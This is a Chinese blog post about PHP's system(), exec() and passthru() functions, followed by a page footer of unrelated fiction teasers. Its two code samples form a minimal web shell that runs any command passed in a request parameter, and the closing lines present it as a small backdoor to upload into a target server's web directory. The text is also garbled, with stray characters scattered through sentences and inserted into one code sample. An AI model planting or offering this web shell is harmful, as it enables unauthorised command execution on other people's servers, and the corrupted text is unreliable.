php執(zhí)行cmd/shell命令 木馬小后門

php執(zhí)行shell命令,可以使用下面幾個函數(shù):?

string system ( string $command [, int &$return_var ] )string exec ( string $command [, array &$output [, int &$return_var ]] )void passthru ( string $command [, int &$return_var ] )

注意:

這三個函數(shù)在默認的情況下舔涎,都是被禁止了的

如果要使用這幾個函數(shù)懒震,

就要先修改php的配置文件php.ini

查找關鍵字disable_functions芬骄,將這一項中的這幾個函數(shù)名刪除掉

然后注意重啟apache。

首先看一下system()和passthru()兩個功能類似粘姜,可以互換:

<?php#獲取網(wǎng)頁傳遞參數(shù)$shell = $_REQUEST['shell'];echo "<pre>";system($shell, $status);echo "</pre>";//注意shell命令的執(zhí)行結果和執(zhí)行返回的狀態(tài)值的對應關系$shell = "<font color='red'>$shell</font>";if( $status ){echo "shell命令{$shell}執(zhí)行失敗";} else {echo "shell命令{$shell}成功執(zhí)行";}?>

訪問地址盗温,并傳遞shell參數(shù)

注意,system()會將shell命令執(zhí)行之后缝左,立馬顯示結果亿遂,這一點會比較不方便,因為我們有時候不需要結果立馬輸出渺杉,甚至不需要輸出蛇数,于是可以用到exec()

exec()的使用示例:?

<?php$shell = <a >艾曉園</a> $_REQUEST['shell'];exec($shell, $result, $status);$shell = "<font color='red'>$shell</font>";echo "<pre>";if( $status ){echo "shell命令{$shell}執(zhí)行失敗";} else {echo "shell命令{$shell}成功執(zhí)行, 結果如下<hr>";print_r( $result );}echo "</pre>";?>

exec()執(zhí)行shell命令成功,但是并不返回結果是越,需要使用輸出命令耳舅,輸出$result結果

作為木馬小后門,上傳到對方服務器下的網(wǎng)站目錄下倚评,訪問該地址浦徊,就可以在靶機上執(zhí)行你想執(zhí)行的命令,并且拿到回顯結果天梧。

?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末盔性,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子呢岗,更是在濱河造成了極大的恐慌冕香,老刑警劉巖,帶你破解...
    沈念sama閱讀 216,544評論 6 501
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件后豫,死亡現(xiàn)場離奇詭異悉尾,居然都是意外死亡,警方通過查閱死者的電腦和手機挫酿,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,430評論 3 392
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進店門构眯,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人早龟,你說我怎么就攤上這事惫霸。” “怎么了拄衰?”我有些...
    開封第一講書人閱讀 162,764評論 0 353
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵它褪,是天一觀的道長饵骨。 經(jīng)常有香客問我翘悉,道長,這世上最難降的妖魔是什么居触? 我笑而不...
    開封第一講書人閱讀 58,193評論 1 292
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任妖混,我火速辦了婚禮老赤,結果婚禮上,老公的妹妹穿的比我還像新娘制市。我一直安慰自己抬旺,他們只是感情好,可當我...
    茶點故事閱讀 67,216評論 6 388
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布祥楣。 她就那樣靜靜地躺著开财,像睡著了一般。 火紅的嫁衣襯著肌膚如雪误褪。 梳的紋絲不亂的頭發(fā)上责鳍,一...
    開封第一講書人閱讀 51,182評論 1 299
  • 城市分裂傳說
    那天,我揣著相機與錄音兽间,去河邊找鬼历葛。 笑死,一個胖子當著我的面吹牛嘀略,可吹牛的內容都是我干的恤溶。 我是一名探鬼主播,決...
    沈念sama閱讀 40,063評論 3 418
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼帜羊,長吁一口氣:“原來是場噩夢啊……” “哼咒程!你這毒婦竟也來了?” 一聲冷哼從身側響起逮壁,我...
    開封第一講書人閱讀 38,917評論 0 274
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤孵坚,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后窥淆,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體卖宠,經(jīng)...
    沈念sama閱讀 45,329評論 1 310
  • ?護林員之死
    正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 37,543評論 2 332
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年忧饭,在試婚紗的時候發(fā)現(xiàn)自己被綠了扛伍。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片较幌。...
    茶點故事閱讀 39,722評論 1 348
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡接箫,死狀恐怖班眯,靈堂內的尸體忽然破棺而出富寿,到底是詐尸還是另有隱情锈嫩,我是刑警寧澤舔哪,帶...
    沈念sama閱讀 35,425評論 5 343
  • ?日本核電站爆炸內幕
    正文 年R本政府宣布穴豫,位于F島的核電站渤滞,受9級特大地震影響渔肩,放射性物質發(fā)生泄漏因俐。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,019評論 3 326
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望抹剩。 院中可真熱鬧撑帖,春花似錦、人聲如沸澳眷。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,671評論 0 22
  • 一樁弒父案,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽钳踊。三九已至衷敌,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間拓瞪,已是汗流浹背逢享。 一陣腳步聲響...
    開封第一講書人閱讀 32,825評論 1 269
  • 情欲美人皮
    我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留吴藻,地道東北人瞒爬。 一個月前我還...
    沈念sama閱讀 47,729評論 2 368
  • 代替公主和親
    正文 我出身青樓,卻偏偏與公主長得像沟堡,于是被迫代替她去往敵國和親侧但。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 44,614評論 2 353